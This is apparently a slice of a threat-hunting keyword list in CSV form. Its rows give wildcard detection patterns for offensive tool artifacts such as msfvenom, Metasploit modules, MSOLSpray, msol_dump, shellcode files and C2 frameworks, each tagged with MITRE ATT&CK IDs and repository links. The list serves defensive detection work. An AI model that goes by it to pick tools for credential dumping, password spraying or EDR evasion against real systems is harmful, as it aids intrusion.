+"*msfencode*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfJavaToolkit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf-json-rpc.*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
+"*msf-json-rpc.ru*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msflag.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*MsfModule*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*msfmodule.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*MsfModuleAsFunction*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 
- T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*msfpattern.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfpayload*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfpc.sh*","offensive_tool_keyword","msfpc","A quick way to generate various basic Meterpreter payloads via msfvenom (part of the Metasploit framework)","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","0","N/A","N/A","10","1129","275","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" +"*msfrelay.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf-revhttps*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*MSFRottenPotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*MSFRottenPotato.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf-sgn.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*msfupdate_spec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfvemonpayload*","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","10","10","36","8","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z" +"*msfvenom *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*msfvenom -*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfvenom -*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*--msfvenom *","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*Mshikaki.exe*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" +"*Mshikaki-main*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" +"*mshta/shellcode_inject*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*MSHTAStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*msi-search-main.zip*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*msLDAPDump.py*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" +"*MSOfficeManipulator.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 
/ 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*msol_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*msol_dump.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*MSOLSpray *","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","0","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z"
+"*MSOLSpray.git*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z"
+"*MSOLSpray.ps1*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network 
Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z"
+"*MSOLSpray-master*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z"
+"*mspass.exe*","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*mspass.zip*","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. 
You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*msquic_openssl/msquic.dll*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z"
+"*msquic_openssl/msquic.lib*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z"
+"*MS-RPNVulnerableDC.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*MS-RPRN.exe *","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation From attacking machine entice the Domain Controller to connect using the printer bug. 
Binary from here https://github.com/leechristensen/SpoolSample","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*MS-RPRN.exe \\* \\*/pipe/pwned*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z"
+"*mssgbox_shellcode_arranged_x64.b64*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*mssgbox_shellcode_exitfunc_thread_x64.bin*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*mssgbox_shellcode_x64.b64*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*mssgbox_shellcode_x64.bin*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*mssgbox_shellcode_x64.bin*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*mssgbox_shellcode_x64_with_hexsymbol.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*mssgbox_shellcode_x64_without_hexsymbol.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*mssql_brute.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*mssql_local_auth_bypass.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*mssql_local_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
